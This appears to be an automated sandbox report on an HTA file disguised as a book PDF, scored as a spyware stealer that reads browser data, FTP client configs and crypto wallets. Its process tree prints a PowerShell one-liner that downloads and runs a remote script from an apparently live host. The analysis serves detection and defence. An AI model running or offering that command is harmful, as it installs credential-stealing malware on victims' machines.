f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17

General

Target

Book_PDF_a4_id_456543243432.hta
Size

46KB
MD5

5fbdd6357b961e941acd3c06ba2e867e
SHA1

ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
SHA256

f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
SHA512

c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
SSDEEP

768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H

Score

10^/10

spyware stealer

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 436 740 powershell.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

14 436 powershell.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

436 powershell.exe
436 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 436 powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	740	powershell.exe

flow	pid	process
14	436	powershell.exe

pid	process
436	powershell.exe
436	powershell.exe

description	pid	process
Token: SeDebugPrivilege	436	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

powershell.execsc.exe

description	pid	process	target process
PID 436 wrote to memory of 2124	436	powershell.exe	csc.exe
PID 436 wrote to memory of 2124	436	powershell.exe	csc.exe
PID 2124 wrote to memory of 3676	2124	csc.exe	cvtres.exe
PID 2124 wrote to memory of 3676	2124	csc.exe	cvtres.exe
PID 436 wrote to memory of 2932	436	powershell.exe	RegAsm.exe
PID 436 wrote to memory of 2932	436	powershell.exe	RegAsm.exe
PID 436 wrote to memory of 2932	436	powershell.exe	RegAsm.exe
PID 436 wrote to memory of 2932	436	powershell.exe	RegAsm.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Book_PDF_a4_id_456543243432.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\va3syipp\va3syipp.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37AA.tmp" "c:\Users\Admin\AppData\Local\Temp\va3syipp\CSC8904E7638F2F4BA6811C6441F9AAA635.TMP"
3⤵
PID:3676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
2⤵
PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

3

T1552

Credentials In Files

3

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

3

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES37AA.tmp

Filesize
1KB

MD5
50b4b2f0b8ab4b53088297851b7e2f10

SHA1
c3a4a5c9997490e667687ecbb922498b4b4fbe74

SHA256
ce9fe0c5e1f6294d48cb1dc12bd4033d3d61a95b12455cd188095203eddd86cf

SHA512
6ed843ba27df8531f079e9960d6e50242faaa288ee34391ab9c587307e9795cdd316d84c78294538740ffb0de4817102bcd241e2e800369ae7ab31193ff30016

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xpiqk5dn.zo3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\va3syipp\va3syipp.dll

Filesize
3KB

MD5
c7728e7824c0a8099501421590e44d56

SHA1
9fdf508c3aba8a5e556ebe464b03216c9b4fab97

SHA256
e997b9d1ef2cc7b9e67a982175cc0a7594dbd8b5301a88d5f9d791847e2eca2f

SHA512
24ef626859ad015c9a64a396f4d7175fc18c03d1363e32e174a95e06e9009c421e842b14ae81e1d55f4c0c5f331a11b7f6eb5994d54c5df53bc41080001a7dad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\va3syipp\CSC8904E7638F2F4BA6811C6441F9AAA635.TMP

Filesize
652B

MD5
4a652ecd36686d221cd8d81f6de0b662

SHA1
c32fed75f95abb07b54f5a0c1737222007bd9af3

SHA256
056e1c2998728b5d3834d5ba4310208d8659a3c3a958cfa0ff6239d1b168248e

SHA512
f9cee8d4f9456524f0c513aeb34924c38c7de611938379aee96f2568d148957780a1754561bd5f30d90ade0a24d251a7253793de53a41bd5c06b4a9287e5bdbe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\va3syipp\va3syipp.0.cs

Filesize
302B

MD5
536c07d095670c7d6cf3045ff8764784

SHA1
bcc7d23eeae1ebdf4ee06434ef24da592580f488

SHA256
c4efd053c4ad51475e24c2c6d2ceef9ff22e936c4242c04e562de675ef27e800

SHA512
60efa933633ce72479ac28bfa36daa9866b9d58645401cf93b2beeedc84bdb88fb944bd35cb86eaf30b4c16c3cdc298783213600fae1b9faa8a08b7a41691fdf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\va3syipp\va3syipp.cmdline

Filesize
369B

MD5
9bd92d95b0fd85de64a267d66d5abc16

SHA1
1e9d4ac55955907ba0e81109e5da6e7c35939814

SHA256
fe9a148a5be5d3869767782a20ae2db0bd80610fbaf1e2063e0a209824183d66

SHA512
1030d5b7de1b1494dd076e3dc1ef0896436028bc634071cdafed776f9e3bbd19981d3335b95d51c6be6e8fd5a5357e8d5d45f94b0f82d84a65e1906981b75515

Download Submit
memory/436-12-0x0000028D71540000-0x0000028D71702000-memory.dmp

Filesize
1.8MB

Download
memory/436-25-0x0000028D6EC20000-0x0000028D6EC28000-memory.dmp

Filesize
32KB

Download
memory/436-0-0x0000028D6EBD0000-0x0000028D6EBF2000-memory.dmp

Filesize
136KB

Download
memory/436-11-0x0000028D6EE00000-0x0000028D6EE10000-memory.dmp

Filesize
64KB

Download
memory/436-10-0x00007FFDFCDB0000-0x00007FFDFD871000-memory.dmp

Filesize
10.8MB

Download
memory/436-27-0x0000028D71370000-0x0000028D714F0000-memory.dmp

Filesize
1.5MB

Download
memory/436-28-0x0000028D6EC30000-0x0000028D6EC31000-memory.dmp

Filesize
4KB

Download
memory/436-31-0x0000028D6EE00000-0x0000028D6EE10000-memory.dmp

Filesize
64KB

Download
memory/436-34-0x00007FFDFCDB0000-0x00007FFDFD871000-memory.dmp

Filesize
10.8MB

Download
memory/2932-29-0x0000000001100000-0x0000000001153000-memory.dmp

Filesize
332KB

Download
memory/2932-30-0x0000000001540000-0x000000000158E000-memory.dmp

Filesize
312KB

Download
memory/2932-36-0x0000000001540000-0x000000000158E000-memory.dmp

Filesize
312KB

Download

Analysis

Sharing